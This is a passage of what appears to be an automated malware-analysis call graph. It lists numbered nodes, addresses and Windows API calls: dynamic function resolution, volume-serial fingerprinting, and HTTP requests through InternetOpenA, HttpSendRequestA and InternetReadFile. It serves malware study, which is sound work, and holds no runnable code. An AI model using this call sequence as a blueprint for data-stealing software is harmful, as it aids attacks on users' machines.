74041->74042 74043 404610 34 API calls 74042->74043 74044 402e70 74043->74044 74045 404610 34 API calls 74044->74045 74046 402e89 74045->74046 74047 404610 34 API calls 74046->74047 74048 402ea2 74047->74048 74049 404610 34 API calls 74048->74049 74050 402ebb 74049->74050 74051 404610 34 API calls 74050->74051 74052 402ed4 74051->74052 74053 404610 34 API calls 74052->74053 74054 402eed 74053->74054 74055 404610 34 API calls 74054->74055 74056 402f06 74055->74056 74057 404610 34 API calls 74056->74057 74058 402f1f 74057->74058 74059 404610 34 API calls 74058->74059 74060 402f38 74059->74060 74061 404610 34 API calls 74060->74061 74062 402f51 74061->74062 74063 404610 34 API calls 74062->74063 74064 402f6a 74063->74064 74065 404610 34 API calls 74064->74065 74066 402f83 74065->74066 74067 404610 34 API calls 74066->74067 74068 402f9c 74067->74068 74069 404610 34 API calls 74068->74069 74070 402fb5 74069->74070 74071 404610 34 API calls 74070->74071 74072 402fce 74071->74072 74073 404610 34 API calls 74072->74073 74074 402fe7 74073->74074 74075 404610 34 API calls 74074->74075 74076 403000 74075->74076 74077 404610 34 API calls 74076->74077 74078 403019 74077->74078 74079 404610 34 API calls 74078->74079 74080 403032 74079->74080 74081 404610 34 API calls 74080->74081 74082 40304b 74081->74082 74083 404610 34 API calls 74082->74083 74084 403064 74083->74084 74085 404610 34 API calls 74084->74085 74086 40307d 74085->74086 74087 404610 34 API calls 74086->74087 74088 403096 74087->74088 74089 404610 34 API calls 74088->74089 74090 4030af 74089->74090 74091 404610 34 API calls 74090->74091 74092 4030c8 74091->74092 74093 404610 34 API calls 74092->74093 74094 4030e1 74093->74094 74095 404610 34 API calls 74094->74095 74096 4030fa 74095->74096 74097 404610 34 API calls 74096->74097 74098 403113 74097->74098 74099 404610 34 API calls 74098->74099 74100 40312c 74099->74100 74101 404610 34 API calls 74100->74101 74102 403145 74101->74102 74103 404610 34 API calls 74102->74103 74104 40315e 74103->74104 74105 404610 34 API calls 74104->74105 74106 403177 74105->74106 74107 404610 34 API calls 74106->74107 74108 403190 74107->74108 74109 404610 34 API calls 74108->74109 74110 4031a9 74109->74110 74111 404610 34 API calls 74110->74111 74112 4031c2 74111->74112 74113 404610 34 API calls 74112->74113 74114 4031db 74113->74114 74115 404610 34 API calls 74114->74115 74116 4031f4 74115->74116 74117 404610 34 API calls 74116->74117 74118 40320d 74117->74118 74119 404610 34 API calls 74118->74119 74120 403226 74119->74120 74121 404610 34 API calls 74120->74121 74122 40323f 74121->74122 74123 404610 34 API calls 74122->74123 74124 403258 74123->74124 74125 404610 34 API calls 74124->74125 74126 403271 74125->74126 74127 404610 34 API calls 74126->74127 74128 40328a 74127->74128 74129 404610 34 API calls 74128->74129 74130 4032a3 74129->74130 74131 404610 34 API calls 74130->74131 74132 4032bc 74131->74132 74133 404610 34 API calls 74132->74133 74134 4032d5 74133->74134 74135 404610 34 API calls 74134->74135 74136 4032ee 74135->74136 74137 404610 34 API calls 74136->74137 74138 403307 74137->74138 74139 404610 34 API calls 74138->74139 74140 403320 74139->74140 74141 404610 34 API calls 74140->74141 74142 403339 74141->74142 74143 404610 34 API calls 74142->74143 74144 403352 74143->74144 74145 404610 34 API calls 74144->74145 74146 40336b 74145->74146 74147 404610 34 API calls 74146->74147 74148 403384 74147->74148 74149 404610 34 API calls 74148->74149 74150 40339d 74149->74150 74151 404610 34 API calls 74150->74151 74152 4033b6 74151->74152 74153 404610 34 API calls 74152->74153 74154 4033cf 74153->74154 74155 404610 34 API calls 74154->74155 74156 4033e8 74155->74156 74157 404610 34 API calls 74156->74157 74158 403401 74157->74158 74159 404610 34 API calls 74158->74159 74160 40341a 74159->74160 74161 404610 34 API calls 74160->74161 74162 403433 74161->74162 74163 404610 34 API calls 74162->74163 74164 40344c 74163->74164 74165 404610 34 API calls 74164->74165 74166 403465 74165->74166 74167 404610 34 API calls 74166->74167 74168 40347e 74167->74168 74169 404610 34 API calls 74168->74169 74170 403497 74169->74170 74171 404610 34 API calls 74170->74171 74172 4034b0 74171->74172 74173 404610 34 API calls 74172->74173 74174 4034c9 74173->74174 74175 404610 34 API calls 74174->74175 74176 4034e2 74175->74176 74177 404610 34 API calls 74176->74177 74178 4034fb 74177->74178 74179 404610 34 API calls 74178->74179 74180 403514 74179->74180 74181 404610 34 API calls 74180->74181 74182 40352d 74181->74182 74183 404610 34 API calls 74182->74183 74184 403546 74183->74184 74185 404610 34 API calls 74184->74185 74186 40355f 74185->74186 74187 404610 34 API calls 74186->74187 74188 403578 74187->74188 74189 404610 34 API calls 74188->74189 74190 403591 74189->74190 74191 404610 34 API calls 74190->74191 74192 4035aa 74191->74192 74193 404610 34 API calls 74192->74193 74194 4035c3 74193->74194 74195 404610 34 API calls 74194->74195 74196 4035dc 74195->74196 74197 404610 34 API calls 74196->74197 74198 4035f5 74197->74198 74199 404610 34 API calls 74198->74199 74200 40360e 74199->74200 74201 404610 34 API calls 74200->74201 74202 403627 74201->74202 74203 404610 34 API calls 74202->74203 74204 403640 74203->74204 74205 404610 34 API calls 74204->74205 74206 403659 74205->74206 74207 404610 34 API calls 74206->74207 74208 403672 74207->74208 74209 404610 34 API calls 74208->74209 74210 40368b 74209->74210 74211 404610 34 API calls 74210->74211 74212 4036a4 74211->74212 74213 404610 34 API calls 74212->74213 74214 4036bd 74213->74214 74215 404610 34 API calls 74214->74215 74216 4036d6 74215->74216 74217 404610 34 API calls 74216->74217 74218 4036ef 74217->74218 74219 404610 34 API calls 74218->74219 74220 403708 74219->74220 74221 404610 34 API calls 74220->74221 74222 403721 74221->74222 74223 404610 34 API calls 74222->74223 74224 40373a 74223->74224 74225 404610 34 API calls 74224->74225 74226 403753 74225->74226 74227 404610 34 API calls 74226->74227 74228 40376c 74227->74228 74229 404610 34 API calls 74228->74229 74230 403785 74229->74230 74231 404610 34 API calls 74230->74231 74232 40379e 74231->74232 74233 404610 34 API calls 74232->74233 74234 4037b7 74233->74234 74235 404610 34 API calls 74234->74235 74236 4037d0 74235->74236 74237 404610 34 API calls 74236->74237 74238 4037e9 74237->74238 74239 404610 34 API calls 74238->74239 74240 403802 74239->74240 74241 404610 34 API calls 74240->74241 74242 40381b 74241->74242 74243 404610 34 API calls 74242->74243 74244 403834 74243->74244 74245 404610 34 API calls 74244->74245 74246 40384d 74245->74246 74247 404610 34 API calls 74246->74247 74248 403866 74247->74248 74249 404610 34 API calls 74248->74249 74250 40387f 74249->74250 74251 404610 34 API calls 74250->74251 74252 403898 74251->74252 74253 404610 34 API calls 74252->74253 74254 4038b1 74253->74254 74255 404610 34 API calls 74254->74255 74256 4038ca 74255->74256 74257 404610 34 API calls 74256->74257 74258 4038e3 74257->74258 74259 404610 34 API calls 74258->74259 74260 4038fc 74259->74260 74261 404610 34 API calls 74260->74261 74262 403915 74261->74262 74263 404610 34 API calls 74262->74263 74264 40392e 74263->74264 74265 404610 34 API calls 74264->74265 74266 403947 74265->74266 74267 404610 34 API calls 74266->74267 74268 403960 74267->74268 74269 404610 34 API calls 74268->74269 74270 403979 74269->74270 74271 404610 34 API calls 74270->74271 74272 403992 74271->74272 74273 404610 34 API calls 74272->74273 74274 4039ab 74273->74274 74275 404610 34 API calls 74274->74275 74276 4039c4 74275->74276 74277 404610 34 API calls 74276->74277 74278 4039dd 74277->74278 74279 404610 34 API calls 74278->74279 74280 4039f6 74279->74280 74281 404610 34 API calls 74280->74281 74282 403a0f 74281->74282 74283 404610 34 API calls 74282->74283 74284 403a28 74283->74284 74285 404610 34 API calls 74284->74285 74286 403a41 74285->74286 74287 404610 34 API calls 74286->74287 74288 403a5a 74287->74288 74289 404610 34 API calls 74288->74289 74290 403a73 74289->74290 74291 404610 34 API calls 74290->74291 74292 403a8c 74291->74292 74293 404610 34 API calls 74292->74293 74294 403aa5 74293->74294 74295 404610 34 API calls 74294->74295 74296 403abe 74295->74296 74297 404610 34 API calls 74296->74297 74298 403ad7 74297->74298 74299 404610 34 API calls 74298->74299 74300 403af0 74299->74300 74301 404610 34 API calls 74300->74301 74302 403b09 74301->74302 74303 404610 34 API calls 74302->74303 74304 403b22 74303->74304 74305 404610 34 API calls 74304->74305 74306 403b3b 74305->74306 74307 404610 34 API calls 74306->74307 74308 403b54 74307->74308 74309 404610 34 API calls 74308->74309 74310 403b6d 74309->74310 74311 404610 34 API calls 74310->74311 74312 403b86 74311->74312 74313 404610 34 API calls 74312->74313 74314 403b9f 74313->74314 74315 404610 34 API calls 74314->74315 74316 403bb8 74315->74316 74317 404610 34 API calls 74316->74317 74318 403bd1 74317->74318 74319 404610 34 API calls 74318->74319 74320 403bea 74319->74320 74321 404610 34 API calls 74320->74321 74322 403c03 74321->74322 74323 404610 34 API calls 74322->74323 74324 403c1c 74323->74324 74325 404610 34 API calls 74324->74325 74326 403c35 74325->74326 74327 404610 34 API calls 74326->74327 74328 403c4e 74327->74328 74329 404610 34 API calls 74328->74329 74330 403c67 74329->74330 74331 404610 34 API calls 74330->74331 74332 403c80 74331->74332 74333 404610 34 API calls 74332->74333 74334 403c99 74333->74334 74335 404610 34 API calls 74334->74335 74336 403cb2 74335->74336 74337 404610 34 API calls 74336->74337 74338 403ccb 74337->74338 74339 404610 34 API calls 74338->74339 74340 403ce4 74339->74340 74341 404610 34 API calls 74340->74341 74342 403cfd 74341->74342 74343 404610 34 API calls 74342->74343 74344 403d16 74343->74344 74345 404610 34 API calls 74344->74345 74346 403d2f 74345->74346 74347 404610 34 API calls 74346->74347 74348 403d48 74347->74348 74349 404610 34 API calls 74348->74349 74350 403d61 74349->74350 74351 404610 34 API calls 74350->74351 74352 403d7a 74351->74352 74353 404610 34 API calls 74352->74353 74354 403d93 74353->74354 74355 404610 34 API calls 74354->74355 74356 403dac 74355->74356 74357 404610 34 API calls 74356->74357 74358 403dc5 74357->74358 74359 404610 34 API calls 74358->74359 74360 403dde 74359->74360 74361 404610 34 API calls 74360->74361 74362 403df7 74361->74362 74363 404610 34 API calls 74362->74363 74364 403e10 74363->74364 74365 404610 34 API calls 74364->74365 74366 403e29 74365->74366 74367 404610 34 API calls 74366->74367 74368 403e42 74367->74368 74369 404610 34 API calls 74368->74369 74370 403e5b 74369->74370 74371 404610 34 API calls 74370->74371 74372 403e74 74371->74372 74373 404610 34 API calls 74372->74373 74374 403e8d 74373->74374 74375 404610 34 API calls 74374->74375 74376 403ea6 74375->74376 74377 404610 34 API calls 74376->74377 74378 403ebf 74377->74378 74379 404610 34 API calls 74378->74379 74380 403ed8 74379->74380 74381 404610 34 API calls 74380->74381 74382 403ef1 74381->74382 74383 404610 34 API calls 74382->74383 74384 403f0a 74383->74384 74385 404610 34 API calls 74384->74385 74386 403f23 74385->74386 74387 404610 34 API calls 74386->74387 74388 403f3c 74387->74388 74389 404610 34 API calls 74388->74389 74390 403f55 74389->74390 74391 404610 34 API calls 74390->74391 74392 403f6e 74391->74392 74393 404610 34 API calls 74392->74393 74394 403f87 74393->74394 74395 404610 34 API calls 74394->74395 74396 403fa0 74395->74396 74397 404610 34 API calls 74396->74397 74398 403fb9 74397->74398 74399 404610 34 API calls 74398->74399 74400 403fd2 74399->74400 74401 404610 34 API calls 74400->74401 74402 403feb 74401->74402 74403 404610 34 API calls 74402->74403 74404 404004 74403->74404 74405 404610 34 API calls 74404->74405 74406 40401d 74405->74406 74407 404610 34 API calls 74406->74407 74408 404036 74407->74408 74409 404610 34 API calls 74408->74409 74410 40404f 74409->74410 74411 404610 34 API calls 74410->74411 74412 404068 74411->74412 74413 404610 34 API calls 74412->74413 74414 404081 74413->74414 74415 404610 34 API calls 74414->74415 74416 40409a 74415->74416 74417 404610 34 API calls 74416->74417 74418 4040b3 74417->74418 74419 404610 34 API calls 74418->74419 74420 4040cc 74419->74420 74421 404610 34 API calls 74420->74421 74422 4040e5 74421->74422 74423 404610 34 API calls 74422->74423 74424 4040fe 74423->74424 74425 404610 34 API calls 74424->74425 74426 404117 74425->74426 74427 404610 34 API calls 74426->74427 74428 404130 74427->74428 74429 404610 34 API calls 74428->74429 74430 404149 74429->74430 74431 404610 34 API calls 74430->74431 74432 404162 74431->74432 74433 404610 34 API calls 74432->74433 74434 40417b 74433->74434 74435 404610 34 API calls 74434->74435 74436 404194 74435->74436 74437 404610 34 API calls 74436->74437 74438 4041ad 74437->74438 74439 404610 34 API calls 74438->74439 74440 4041c6 74439->74440 74441 404610 34 API calls 74440->74441 74442 4041df 74441->74442 74443 404610 34 API calls 74442->74443 74444 4041f8 74443->74444 74445 404610 34 API calls 74444->74445 74446 404211 74445->74446 74447 404610 34 API calls 74446->74447 74448 40422a 74447->74448 74449 404610 34 API calls 74448->74449 74450 404243 74449->74450 74451 404610 34 API calls 74450->74451 74452 40425c 74451->74452 74453 404610 34 API calls 74452->74453 74454 404275 74453->74454 74455 404610 34 API calls 74454->74455 74456 40428e 74455->74456 74457 404610 34 API calls 74456->74457 74458 4042a7 74457->74458 74459 404610 34 API calls 74458->74459 74460 4042c0 74459->74460 74461 404610 34 API calls 74460->74461 74462 4042d9 74461->74462 74463 404610 34 API calls 74462->74463 74464 4042f2 74463->74464 74465 404610 34 API calls 74464->74465 74466 40430b 74465->74466 74467 404610 34 API calls 74466->74467 74468 404324 74467->74468 74469 404610 34 API calls 74468->74469 74470 40433d 74469->74470 74471 404610 34 API calls 74470->74471 74472 404356 74471->74472 74473 404610 34 API calls 74472->74473 74474 40436f 74473->74474 74475 404610 34 API calls 74474->74475 74476 404388 74475->74476 74477 404610 34 API calls 74476->74477 74478 4043a1 74477->74478 74479 404610 34 API calls 74478->74479 74480 4043ba 74479->74480 74481 404610 34 API calls 74480->74481 74482 4043d3 74481->74482 74483 404610 34 API calls 74482->74483 74484 4043ec 74483->74484 74485 404610 34 API calls 74484->74485 74486 404405 74485->74486 74487 404610 34 API calls 74486->74487 74488 40441e 74487->74488 74489 404610 34 API calls 74488->74489 74490 404437 74489->74490 74491 404610 34 API calls 74490->74491 74492 404450 74491->74492 74493 404610 34 API calls 74492->74493 74494 404469 74493->74494 74495 404610 34 API calls 74494->74495 74496 404482 74495->74496 74497 404610 34 API calls 74496->74497 74498 40449b 74497->74498 74499 404610 34 API calls 74498->74499 74500 4044b4 74499->74500 74501 404610 34 API calls 74500->74501 74502 4044cd 74501->74502 74503 404610 34 API calls 74502->74503 74504 4044e6 74503->74504 74505 404610 34 API calls 74504->74505 74506 4044ff 74505->74506 74507 404610 34 API calls 74506->74507 74508 404518 74507->74508 74509 404610 34 API calls 74508->74509 74510 404531 74509->74510 74511 404610 34 API calls 74510->74511 74512 40454a 74511->74512 74513 404610 34 API calls 74512->74513 74514 404563 74513->74514 74515 404610 34 API calls 74514->74515 74516 40457c 74515->74516 74517 404610 34 API calls 74516->74517 74518 404595 74517->74518 74519 404610 34 API calls 74518->74519 74520 4045ae 74519->74520 74521 404610 34 API calls 74520->74521 74522 4045c7 74521->74522 74523 404610 34 API calls 74522->74523 74524 4045e0 74523->74524 74525 404610 34 API calls 74524->74525 74526 4045f9 74525->74526 74527 419f20 74526->74527 74528 419f30 43 API calls 74527->74528 74529 41a346 8 API calls 74527->74529 74528->74529 74530 41a456 74529->74530 74531 41a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 74529->74531 74532 41a463 8 API calls 74530->74532 74533 41a526 74530->74533 74531->74530 74532->74533 74534 41a5a8 74533->74534 74535 41a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 74533->74535 74536 41a5b5 6 API calls 74534->74536 74537 41a647 74534->74537 74535->74534 74536->74537 74538 41a654 9 API calls 74537->74538 74539 41a72f 74537->74539 74538->74539 74540 41a7b2 74539->74540 74541 41a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 74539->74541 74542 41a7bb GetProcAddress GetProcAddress 74540->74542 74543 41a7ec 74540->74543 74541->74540 74542->74543 74544 41a825 74543->74544 74545 41a7f5 GetProcAddress GetProcAddress 74543->74545 74546 41a922 74544->74546 74547 41a832 10 API calls 74544->74547 74545->74544 74548 41a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 74546->74548 74549 41a98d 74546->74549 74547->74546 74548->74549 74550 41a996 GetProcAddress 74549->74550 74551 41a9ae 74549->74551 74550->74551 74552 41a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 74551->74552 74553 415ef3 74551->74553 74552->74553 74554 401590 74553->74554 75653 4016b0 74554->75653 74557 41aab0 lstrcpy 74558 4015b5 74557->74558 74559 41aab0 lstrcpy 74558->74559 74560 4015c7 74559->74560 74561 41aab0 lstrcpy 74560->74561 74562 4015d9 74561->74562 74563 41aab0 lstrcpy 74562->74563 74564 401663 74563->74564 74565 415760 74564->74565 74566 415771 74565->74566 74567 41ab30 2 API calls 74566->74567 74568 41577e 74567->74568 74569 41ab30 2 API calls 74568->74569 74570 41578b 74569->74570 74571 41ab30 2 API calls 74570->74571 74572 415798 74571->74572 74573 41aa50 lstrcpy 74572->74573 74574 4157a5 74573->74574 74575 41aa50 lstrcpy 74574->74575 74576 4157b2 74575->74576 74577 41aa50 lstrcpy 74576->74577 74578 4157bf 74577->74578 74579 41aa50 lstrcpy 74578->74579 74608 4157cc 74579->74608 74580 415893 StrCmpCA 74580->74608 74581 4158f0 StrCmpCA 74582 415a2c 74581->74582 74581->74608 74583 41abb0 lstrcpy 74582->74583 74584 415a38 74583->74584 74585 41ab30 2 API calls 74584->74585 74587 415a46 74585->74587 74586 41ab30 lstrlenA lstrcpy 74586->74608 74589 41ab30 2 API calls 74587->74589 74588 415aa6 StrCmpCA 74590 415be1 74588->74590 74588->74608 74595 415a55 74589->74595 74594 41abb0 lstrcpy 74590->74594 74591 41aa50 lstrcpy 74591->74608 74592 41aab0 lstrcpy 74592->74608 74593 41abb0 lstrcpy 74593->74608 74596 415bed 74594->74596 74597 4016b0 lstrcpy 74595->74597 74598 41ab30 2 API calls 74596->74598 74613 415a61 74597->74613 74599 415bfb 74598->74599 74602 41ab30 2 API calls 74599->74602 74600 415c5b StrCmpCA 74603 415c66 Sleep 74600->74603 74604 415c78 74600->74604 74601 415510 29 API calls 74601->74608 74605 415c0a 74602->74605 74603->74608 74606 41abb0 lstrcpy 74604->74606 74609 4016b0 lstrcpy 74605->74609 74610 415c84 74606->74610 74607 401590 lstrcpy 74607->74608 74608->74580 74608->74581 74608->74586 74608->74588 74608->74591 74608->74592 74608->74593 74608->74600 74608->74601 74608->74607 74616 4159da StrCmpCA 74608->74616 74618 415b8f StrCmpCA 74608->74618 74619 415440 23 API calls 74608->74619 74609->74613 74611 41ab30 2 API calls 74610->74611 74612 415c93 74611->74612 74614 41ab30 2 API calls 74612->74614 74613->73672 74615 415ca2 74614->74615 74617 4016b0 lstrcpy 74615->74617 74616->74608 74617->74613 74618->74608 74619->74608 74621 4176e3 GetVolumeInformationA 74620->74621 74622 4176dc 74620->74622 74623 417721 74621->74623 74622->74621 74624 41778c GetProcessHeap HeapAlloc 74623->74624 74625 4177a9 74624->74625 74626 4177b8 wsprintfA 74624->74626 74627 41aa50 lstrcpy 74625->74627 74628 41aa50 lstrcpy 74626->74628 74629 415ff7 74627->74629 74628->74629 74629->73693 74631 41aab0 lstrcpy 74630->74631 74632 4048e9 74631->74632 75662 404800 74632->75662 74634 4048f5 74635 41aa50 lstrcpy 74634->74635 74636 404927 74635->74636 74637 41aa50 lstrcpy 74636->74637 74638 404934 74637->74638 74639 41aa50 lstrcpy 74638->74639 74640 404941 74639->74640 74641 41aa50 lstrcpy 74640->74641 74642 40494e 74641->74642 74643 41aa50 lstrcpy 74642->74643 74644 40495b InternetOpenA StrCmpCA 74643->74644 74645 404994 74644->74645 74646 404f1b InternetCloseHandle 74645->74646 75670 418cf0 74645->75670 74648 404f38 74646->74648 75685 40a210 CryptStringToBinaryA 74648->75685 74649 4049b3 75678 41ac30 74649->75678 74653 4049c6 74654 41abb0 lstrcpy 74653->74654 74659 4049cf 74654->74659 74655 41ab30 2 API calls 74656 404f55 74655->74656 74657 41acc0 4 API calls 74656->74657 74660 404f6b 74657->74660 74658 404f77 codecvt 74661 41aab0 lstrcpy 74658->74661 74663 41acc0 4 API calls 74659->74663 74662 41abb0 lstrcpy 74660->74662 74674 404fa7 74661->74674 74662->74658 74664 4049f9 74663->74664 74665 41abb0 lstrcpy 74664->74665 74666 404a02 74665->74666 74667 41acc0 4 API calls 74666->74667 74668 404a21 74667->74668 74669 41abb0 lstrcpy 74668->74669 74670 404a2a 74669->74670 74671 41ac30 3 API calls 74670->74671 74672 404a48 74671->74672 74673 41abb0 lstrcpy 74672->74673 74675 404a51 74673->74675 74674->73696 74676 41acc0 4 API calls 74675->74676 74677 404a70 74676->74677 74678 41abb0 lstrcpy 74677->74678 74679 404a79 74678->74679 74680 41acc0 4 API calls 74679->74680 74681 404a98 74680->74681 74682 41abb0 lstrcpy 74681->74682 74683 404aa1 74682->74683 74684 41acc0 4 API calls 74683->74684 74685 404acd 74684->74685 74686 41ac30 3 API calls 74685->74686 74687 404ad4 74686->74687 74688 41abb0 lstrcpy 74687->74688 74689 404add 74688->74689 74690 404af3 InternetConnectA 74689->74690 74690->74646 74691 404b23 HttpOpenRequestA 74690->74691 74693 404b78 74691->74693 74694 404f0e InternetCloseHandle 74691->74694 74695 41acc0 4 API calls 74693->74695 74694->74646 74696 404b8c 74695->74696 74697 41abb0 lstrcpy 74696->74697 74698 404b95 74697->74698 74699 41ac30 3 API calls 74698->74699 74700 404bb3 74699->74700 74701 41abb0 lstrcpy 74700->74701 74702 404bbc 74701->74702 74703 41acc0 4 API calls 74702->74703 74704 404bdb 74703->74704 74705 41abb0 lstrcpy 74704->74705 74706 404be4 74705->74706 74707 41acc0 4 API calls 74706->74707 74708 404c05 74707->74708 74709 41abb0 lstrcpy 74708->74709 74710 404c0e 74709->74710 74711 41acc0 4 API calls 74710->74711 74712 404c2e 74711->74712 74713 41abb0 lstrcpy 74712->74713 74714 404c37 74713->74714 74715 41acc0 4 API calls 74714->74715 74716 404c56 74715->74716 74717 41abb0 lstrcpy 74716->74717 74718 404c5f 74717->74718 74719 41ac30 3 API calls 74718->74719 74720 404c7d 74719->74720 74721 41abb0 lstrcpy 74720->74721 74722 404c86 74721->74722 74723 41acc0 4 API calls 74722->74723 74724 404ca5 74723->74724 74725 41abb0 lstrcpy 74724->74725 74726 404cae 74725->74726 74727 41acc0 4 API calls 74726->74727 74728 404ccd 74727->74728 74729 41abb0 lstrcpy 74728->74729 74730 404cd6 74729->74730 74731 41ac30 3 API calls 74730->74731 74732 404cf4 74731->74732 74733 41abb0 lstrcpy 74732->74733 74734 404cfd 74733->74734 74735 41acc0 4 API calls 74734->74735 74736 404d1c 74735->74736 74737 41abb0 lstrcpy 74736->74737 74738 404d25 74737->74738 74739 41acc0 4 API calls 74738->74739 74740 404d46 74739->74740 74741 41abb0 lstrcpy 74740->74741 74742 404d4f 74741->74742 74743 41acc0 4 API calls 74742->74743 74744 404d6f 74743->74744 74745 41abb0 lstrcpy 74744->74745 74746 404d78 74745->74746 74747 41acc0 4 API calls 74746->74747 74748 404d97 74747->74748 74749 41abb0 lstrcpy 74748->74749 74750 404da0 74749->74750 74751 41ac30 3 API calls 74750->74751 74752 404dbe 74751->74752 74753 41abb0 lstrcpy 74752->74753 74754 404dc7 74753->74754 74755 41aa50 lstrcpy 74754->74755 74756 404de2 74755->74756 74757 41ac30 3 API calls 74756->74757 74758 404e03 74757->74758 74759 41ac30 3 API calls 74758->74759 74760 404e0a 74759->74760 74761 41abb0 lstrcpy 74760->74761 74762 404e16 74761->74762 74763 404e37 lstrlenA 74762->74763 74764 404e4a 74763->74764 74765 404e53 lstrlenA 74764->74765 75684 41ade0 74765->75684 74767 404e63 HttpSendRequestA 74768 404e82 InternetReadFile 74767->74768 74769 404eb7 InternetCloseHandle 74768->74769 74774 404eae 74768->74774 74772 41ab10 74769->74772 74771 41acc0 4 API calls 74771->74774 74772->74694 74773 41abb0 lstrcpy 74773->74774 74774->74768 74774->74769 74774->74771 74774->74773 75694 41ade0 74775->75694 74777 411a14 StrCmpCA 74778 411a27 74777->74778 74779 411a1f ExitProcess 74777->74779 74780 411a37 strtok_s 74778->74780 74794 411a44 74780->74794 74781 411c12 74781->73698 74782 411bee strtok_s 74782->74794 74783 411b41 StrCmpCA 74783->74794 74784 411ba1 StrCmpCA 74784->74794 74785 411bc0 StrCmpCA 74785->74794 74786 411b63 StrCmpCA 74786->74794 74787 411b82 StrCmpCA 74787->74794 74788 411aad StrCmpCA 74788->74794 74789 411acf StrCmpCA 74789->74794 74790 411afd StrCmpCA 74790->74794 74791 411b1f StrCmpCA 74791->74794 74792 41ab30 2 API calls 74792->74782 74793 41ab30 lstrlenA lstrcpy 74793->74794 74794->74781 74794->74782 74794->74783 74794->74784 74794->74785 74794->74786 74794->74787 74794->74788 74794->74789 74794->74790 74794->74791 74794->74792 74794->74793 74796 41aab0 lstrcpy 74795->74796 74797 4059c9 74796->74797 74798 404800 5 API calls 74797->74798 74799 4059d5 74798->74799 74800 41aa50 lstrcpy 74799->74800 74801 405a0a 74800->74801 74802 41aa50 lstrcpy 74801->74802 74803 405a17 74802->74803 74804 41aa50 lstrcpy 74803->74804 74805 405a24 74804->74805 74806 41aa50 lstrcpy 74805->74806 74807 405a31 74806->74807 74808 41aa50 lstrcpy 74807->74808 74809 405a3e InternetOpenA StrCmpCA 74808->74809 74810 405a6d 74809->74810 74811 406013 InternetCloseHandle 74810->74811 74813 418cf0 3 API calls 74810->74813 74812 406030 74811->74812 74815 40a210 4 API calls 74812->74815 74814 405a8c 74813->74814 74816 41ac30 3 API calls 74814->74816 74817 406036 74815->74817 74818 405a9f 74816->74818 74820 41ab30 2 API calls 74817->74820 74823 40606f codecvt 74817->74823 74819 41abb0 lstrcpy 74818->74819 74825 405aa8 74819->74825 74821 40604d 74820->74821 74822 41acc0 4 API calls 74821->74822 74824 406063 74822->74824 74827 41aab0 lstrcpy 74823->74827 74826 41abb0 lstrcpy 74824->74826 74828 41acc0 4 API calls 74825->74828 74826->74823 74837 40609f 74827->74837 74829 405ad2 74828->74829 74830 41abb0 lstrcpy 74829->74830 74831 405adb 74830->74831 74832 41acc0 4 API calls 74831->74832 74833 405afa 74832->74833 74834 41abb0 lstrcpy 74833->74834 74835 405b03 74834->74835 74836 41ac30 3 API calls 74835->74836 74838 405b21 74836->74838 74837->73704 74839 41abb0 lstrcpy 74838->74839 74840 405b2a 74839->74840 74841 41acc0 4 API calls 74840->74841 74842 405b49 74841->74842 74843 41abb0 lstrcpy 74842->74843 74844 405b52 74843->74844 74845 41acc0 4 API calls 74844->74845 74846 405b71 74845->74846 74847 41abb0 lstrcpy 74846->74847 74848 405b7a 74847->74848 74849 41acc0 4 API calls 74848->74849 74850 405ba6 74849->74850 74851 41ac30 3 API calls 74850->74851 74852 405bad 74851->74852 74853 41abb0 lstrcpy 74852->74853 74854 405bb6 74853->74854 74855 405bcc InternetConnectA 74854->74855 74855->74811 74856 405bfc HttpOpenRequestA 74855->74856 74858 406006 InternetCloseHandle 74856->74858 74859 405c5b 74856->74859 74858->74811 74860 41acc0 4 API calls 74859->74860 74861 405c6f 74860->74861 74862 41abb0 lstrcpy 74861->74862 74863 405c78 74862->74863 74864 41ac30 3 API calls 74863->74864 74865 405c96 74864->74865 74866 41abb0 lstrcpy 74865->74866 74867 405c9f 74866->74867 74868 41acc0 4 API calls 74867->74868 74869 405cbe 74868->74869 74870 41abb0 lstrcpy 74869->74870 74871 405cc7 74870->74871 74872 41acc0 4 API calls 74871->74872 74873 405ce8 74872->74873 74874 41abb0 lstrcpy 74873->74874 74875 405cf1 74874->74875 74876 41acc0 4 API calls 74875->74876 74877 405d11 74876->74877 74878 41abb0 lstrcpy 74877->74878 74879 405d1a 74878->74879 74880 41acc0 4 API calls 74879->74880 74881 405d39 74880->74881 74882 41abb0 lstrcpy 74881->74882 74883 405d42 74882->74883 74884 41ac30 3 API calls 74883->74884 74885 405d60 74884->74885 74886 41abb0 lstrcpy 74885->74886 74887 405d69 74886->74887 74888 41acc0 4 API calls 74887->74888 74889 405d88 74888->74889 74890 41abb0 lstrcpy 74889->74890 74891 405d91 74890->74891 74892 41acc0 4 API calls 74891->74892 74893 405db0 74892->74893 74894 41abb0 lstrcpy 74893->74894 74895 405db9 74894->74895 74896 41ac30 3 API calls 74895->74896 74897 405dd7 74896->74897 74898 41abb0 lstrcpy 74897->74898 74899 405de0 74898->74899 74900 41acc0 4 API calls 74899->74900 74901 405dff 74900->74901 74902 41abb0 lstrcpy 74901->74902 74903 405e08 74902->74903 74904 41acc0 4 API calls 74903->74904 74905 405e29 74904->74905 74906 41abb0 lstrcpy 74905->74906 74907 405e32 74906->74907 74908 41acc0 4 API calls 74907->74908 74909 405e52 74908->74909 74910 41abb0 lstrcpy 74909->74910 74911 405e5b 74910->74911 74912 41acc0 4 API calls 74911->74912 74913 405e7a 74912->74913 74914 41abb0 lstrcpy 74913->74914 74915 405e83 74914->74915 74916 41ac30 3 API calls 74915->74916 74917 405ea4 74916->74917 74918 41abb0 lstrcpy 74917->74918 74919 405ead 74918->74919 74920 405ec0 lstrlenA 74919->74920 75695 41ade0 74920->75695 74922 405ed1 lstrlenA GetProcessHeap HeapAlloc 75696 41ade0 74922->75696 74924 405efe lstrlenA 75697 41ade0 74924->75697 74926 405f0e memcpy 75698 41ade0 74926->75698 74928 405f27 lstrlenA 74929 405f37 74928->74929 74930 405f40 lstrlenA memcpy 74929->74930 75699 41ade0 74930->75699 74932 405f6a lstrlenA 75700 41ade0 74932->75700 74934 405f7a HttpSendRequestA 74935 405f85 InternetReadFile 74934->74935 74936 405fba InternetCloseHandle 74935->74936 74940 405fb1 74935->74940 74936->74858 74938 41acc0 4 API calls 74938->74940 74939 41abb0 lstrcpy 